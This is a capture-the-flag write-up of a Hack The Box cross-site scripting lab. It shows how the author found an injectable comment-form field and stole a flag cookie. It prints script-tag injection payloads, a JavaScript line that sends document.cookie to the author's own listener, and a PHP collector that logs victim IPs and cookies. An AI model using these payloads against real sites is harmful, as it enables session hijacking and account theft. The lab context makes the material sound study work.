XSS (Cross-Site Scripting) [Skills Assessment] Hack The Box Writeup

Jun Takemura · January 2, 2025

Skills Assessment


Access the /assessment directory on the server using the browser.

  1. Identify a user-input field that is vulnerable to an XSS vulnerability
  2. Find a working XSS payload that executes JavaScript code on the target’s browser
  3. Using the Session Hijacking techniques, try to steal the victim’s cookies, which should contain the flag

What is the value of the ‘flag’ cookie?


By inspecting the website, I found the search from under /assessment and Comment, Name, Email, and Website forms under /assessment/index.php/2021/06/11/welcome-to-security-blog/. I made an educated guess that there’s a XSS vulnerability here. (actually the blog author name was xss lol)

So first I started running a php server:

php -S

Here means ‘listen on all network interfaces.’ It makes the server accessible from any network interface including localhost, LAN, or external connections.

Then tried the below payloads in the corresponding fields:

<script src="http://MyLocalIp:9000/comment"></script>
<script src="http://MyLocalIp:9000/name"></script>
<script src="http://MyLocalIp:9000/website"></script>

Also I entered [email protected] in the email field.

But this gave me an error ‘Please fill the required fields (name, email).’ I added "> to the name field and my php server got [404]: GET /website - No such file or directory. (Seemed like the name field discarded <script> tag.)

Then I made (actually reused the one I made for the module) this .js file:

new Image().src='http://MyLocalIp:9000/sess_hijack.php?c='+document.cookie;

and this .php file:

if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");

Set them under /tmp/tmpserver where I was running the php server.

And I injected this xss payload in the Website field:

<script src="http://MyLocalIp:9000/steal-cookie.js"></script>

I got a cookie with the flag.

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